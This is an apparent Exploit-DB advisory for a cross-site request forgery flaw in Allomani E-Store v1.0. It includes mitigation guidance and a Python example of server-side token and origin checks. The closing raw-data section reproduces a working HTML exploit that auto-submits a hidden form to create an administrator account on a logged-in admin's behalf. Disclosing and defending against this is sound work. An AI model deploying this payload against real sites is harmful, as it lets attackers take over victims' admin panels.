Vendor: E-Store
By: G0D-F4Th3r
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: E-Store
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:allomani:e-store:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Allomani – E-Store v1.0 – [CSRF] Add Admin Account

The Allomani E-Store v1.0 admin panel (admin/index.php) accepts the adduserok action as a plain POST with no anti-CSRF token and no origin check, so the server cannot tell a request the administrator submitted from one the browser sent on an attacker's behalf. The attacker crafts an HTML page containing a form whose hidden fields carry the parameters of the add-user request (action=adduserok, username, password, email and group_id; the exploit sets group_id to 1 for the administrator group) and submits it automatically with JavaScript when the page loads. If a user who is logged in to the admin panel visits that page, the browser attaches the victim's session cookie to the cross-site POST, the application creates the account, and the attacker can then log in as an administrator with the credentials chosen in the form. The attack only succeeds while the victim holds a valid admin session; an unauthenticated visitor triggers nothing.

Mitigation:

Every state-changing request in the admin panel (here the adduserok action) should carry an unpredictable anti-CSRF token bound to the user's session, sent in a hidden form field and verified server-side before the user is created; a request without a valid token is rejected. The attacker's page cannot supply the token because it appears only in the legitimate form served to the logged-in administrator. Setting the session cookie with SameSite=Lax (or Strict) and rejecting POSTs whose Origin or Referer header is not the application's own origin add defence in depth. Since no vendor patch exists, these fixes have to be applied by the site operator.
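A server-side check of the kind described above, as an added example written for this page rather than code from Allomani E-Store: it models the adduserok handler of admin/index.php as a Python function over a simplified request dictionary, derives a per-session token with an HMAC, and replays the exploit's form (constructed from the hidden fields below) once as the cross-site POST the attacker's page would send and once as a legitimate same-site submission carrying the token. The server secret, session identifier, hostnames and request-dictionary layout are assumptions made for the example.

```python
"""Server-side CSRF defence for an 'adduserok' admin action.

Added example, not Allomani's code: the handler is modelled as a function
over a simplified request dict so the check can be run offline.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Hypothetical server-side secret; a real deployment loads it from config.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Per-session token: HMAC(secret, session_id). The attacker's page cannot
    compute it without the secret and cannot read it from the victim's page."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, presented: Optional[str]) -> bool:
    """Constant-time comparison of the presented token with the expected one."""
    if not presented:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), presented)


def same_site_request(headers: Dict[str, str], site: str = "https://www.site.com") -> bool:
    """Defence in depth: accept only requests the browser marks as same-origin
    (Sec-Fetch-Site) or, for older browsers, whose Origin/Referer is our own."""
    sfs = headers.get("Sec-Fetch-Site")
    if sfs is not None:
        return sfs in ("same-origin", "none")
    origin = headers.get("Origin") or headers.get("Referer", "")
    return origin.startswith(site)


def handle_adduser(request: dict, users: Dict[str, dict]) -> Tuple[int, str]:
    """Model of admin/index.php with action=adduserok (hypothetical layout:
    request = {"method", "headers", "form", "session": {"id", "is_admin"}})."""
    if request["method"] != "POST":
        return 405, "method not allowed"
    session = request["session"]
    if not session.get("is_admin"):
        return 403, "admin login required"
    form = request["form"]
    if form.get("action") != "adduserok":
        return 400, "unknown action"
    # The two checks the vulnerable application lacks.
    if not csrf_token_valid(session["id"], form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    if not same_site_request(request["headers"]):
        return 403, "cross-site request rejected"
    for field in ("username", "password", "email", "group_id"):
        if not form.get(field):
            return 400, "missing " + field
    users[form["username"]] = {"email": form["email"], "group_id": int(form["group_id"])}
    return 200, "user " + form["username"] + " created"


def demo() -> dict:
    """Replay the exploit's form against the hardened handler as a logged-in
    admin, first cross-site (as the attacker's page would), then legitimately."""
    users: Dict[str, dict] = {}
    session = {"id": "admin-session-abc", "is_admin": True}
    # Constructed from the hidden fields of the exploit's form.
    exploit_form = {"action": "adduserok", "username": "test", "password": "test123",
                    "email": "test@test.com", "group_id": "1", "useraddbutton": "اضافة"}
    # What the victim's browser sends from the attacker's page: cookies ride
    # along (hence is_admin is True), but no token and a foreign origin.
    cross_site = {"method": "POST",
                  "headers": {"Origin": "http://attacker.example",
                              "Sec-Fetch-Site": "cross-site"},
                  "form": dict(exploit_form), "session": session}
    # The same fields submitted from the real admin page with its token.
    legit = {"method": "POST",
             "headers": {"Origin": "https://www.site.com", "Sec-Fetch-Site": "same-origin"},
             "form": {**exploit_form, "csrf_token": issue_csrf_token(session["id"])},
             "session": session}
    return {"cross_site": handle_adduser(cross_site, users),
            "legit": handle_adduser(legit, users),
            "users": sorted(users)}


if __name__ == "__main__":
    print(demo())
```

The cross-site replay is refused with 403 before any user is written, while the same form with a valid token from a same-origin page creates the account; the token check alone is sufficient, and the origin check only catches requests that would otherwise have needed a token leak.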

Exploit-DB raw data:

# Exploit Title: Allomani - E-Store v1.0 - [CSRF] Add Admin Account
# Date: 29-06-2010
# Author: G0D-F4Th3r
# Software Link: http://allomani.com/
# Version: 1.0

####################################################
<html>
<body onload="fireForms()">
<script type="text/javascript">
  // Auto-submit the hidden form as soon as the page loads; the victim's
  // browser attaches its admin session cookie for the target site.
  function fireForms() {
    document.forms["form0"].submit();
  }
</script>
<form method="POST" name="form0" action="http://www.site.com/[path]/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="username" value="test"/>
<input type="hidden" name="password" value="test123"/>
<input type="hidden" name="email" value="test@test.com"/>
<!-- group_id 1 is the administrator group -->
<input type="hidden" name="group_id" value="1"/>
<!-- the submit button's value, "Add" in Arabic, as the application expects it -->
<input type="hidden" name="useraddbutton" value="اضافة"/>
</form>
</body>
</html>
##################################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends
##################################################################################